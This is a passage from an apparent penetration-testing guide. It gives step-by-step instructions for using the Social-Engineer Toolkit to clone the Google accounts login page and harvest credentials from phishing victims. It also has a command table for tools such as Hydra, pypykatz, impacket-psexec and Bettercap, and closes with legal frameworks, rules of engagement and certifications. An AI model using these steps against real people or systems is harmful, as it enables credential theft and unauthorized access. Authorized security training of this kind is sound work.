| 3 | Select Website Attack Vector | Menu > 2) Website Attack Vectors | Browser-based attack delivery methods |
| 4 | Select Credential Harvester | Menu > 3) Credential Harvester Attack Method | Captures usernames and passwords from cloned sites |
| 5 | Site Cloner | Menu > 2) Site Cloner Enter your IP address: 192.168.1.10 URL to clone: https://accounts.google.com | SET clones the target site and hosts it locally |
| 6 | Wait for Victim Interaction | — SET listens on port 80 — — Credentials posted by victim appear in console — | Send victim a link to your IP via phishing email |
| 7 | View Captured Credentials | cat /root/.set/harvester/harvester_*.txt | All captured form fields saved to this directory |
Penetration Testing Quick Reference
The following table provides an at-a-glance reference of all tools covered in this document.
| Tool | Category | Platform | Primary Command / Entry Point |
|---|---|---|---|
| Nmap | Recon | Kali / Parrot | nmap -A -T4 <target> |
| theHarvester | OSINT | Kali / Parrot | theHarvester -d <domain> -b all |
| Recon-ng | OSINT Framework | Kali / Parrot | recon-ng |
| Maltego | Graph OSINT | Kali / Parrot | maltego |
| Nikto | Web Scanning | Kali / Parrot | nikto -h <url> |
| OpenVAS/GVM | Vulnerability Mgmt | Kali / Parrot | sudo gvm-start |
| Lynis | Host Audit | Kali / Parrot | sudo lynis audit system |
| Metasploit | Exploitation | Kali / Parrot | msfconsole |
| SQLMap | SQL Injection | Kali / Parrot | sqlmap -u <url> |
| Hashcat | Hash Cracking | Kali / Parrot | hashcat -m <type> -a 0 <hash> <wordlist> |
| Hydra | Online Brute-Force | Kali / Parrot | hydra -l <user> -P <wordlist> <protocol>://<target> |
| John the Ripper | Hash Cracking | Kali / Parrot | john <hashes.txt> --wordlist=rockyou.txt |
| Burp Suite | Web App Proxy | Kali / Parrot | burpsuite |
| OWASP ZAP | Web App Scanner | Kali / Parrot | zaproxy |
| Gobuster | Web Enumeration | Kali / Parrot | gobuster dir -u <url> -w <wordlist> |
| Aircrack-ng | Wi-Fi Auditing | Kali / Parrot | aircrack-ng -w <wordlist> <capture.cap> |
| Wireshark | Packet Analysis | Kali / Parrot | wireshark / tshark -i eth0 |
| Bettercap | MITM Framework | Kali / Parrot | sudo bettercap -iface eth0 |
| Pypykatz | Credential Extraction | Kali / Parrot | pypykatz lsa minidump lsass.dmp |
| Impacket | Windows / AD Attack | Kali / Parrot | impacket-psexec domain/user:pass@<target> |
| AnonSurf | Anonymity | ParrotOS ONLY | sudo anonsurf start |
| Masscan | Fast Port Scan | Kali / Parrot | sudo masscan <range> -p <ports> --rate 1000 |
| Autopsy | Disk Forensics | Kali / Parrot | autopsy → http://localhost:9999/autopsy |
| Volatility 3 | Memory Forensics | Kali / Parrot | python3 vol.py -f <memory.dmp> windows.pslist |
| SET | Social Engineering | Kali / Parrot | sudo setoolkit |
Legal and Ethical Considerations
Legal Frameworks
The following laws govern unauthorized computer access in major jurisdictions:
- United States: Computer Fraud and Abuse Act (18 U.S.C. § 1030) — up to 10 years imprisonment for unauthorized access
- United Kingdom: Computer Misuse Act 1990 (as amended) — up to 10 years imprisonment
- European Union: Directive 2013/40/EU on Attacks Against Information Systems
- Australia: Criminal Code Act 1995, Part 10.7 — Computer Offences
Rules of Engagement for Authorized Penetration Tests
- Obtain a signed Statement of Work (SOW) and Rules of Engagement (RoE) document before beginning
- Define the scope precisely — IP ranges, domains, applications, and testing windows
- Establish escalation procedures for critical findings discovered during the test
- Never access systems or data outside the agreed scope
- Maintain detailed logs of all actions taken during the test for accountability
- Restore all modified systems to their original state after testing
- Report all findings, including critical vulnerabilities, immediately to the client
Recommended Certifications for Penetration Testers
| Certification | Issuing Body | Focus |
|---|---|---|
| OSCP (PEN-200) | Offensive Security | Hands-on practical penetration testing; Kali Linux focused |
| CEH | EC-Council | Certified Ethical Hacker — broad security concepts |
| PNPT | TCM Security | Practical Network Penetration Tester — real-world skills |
| eJPT | INE / eLearnSecurity | Junior Penetration Tester — ideal entry-level certification |
| GPEN | GIAC / SANS | GIAC Penetration Tester — enterprise-focused methodology |
| CPENT | EC-Council | Certified Penetration Testing Professional — advanced |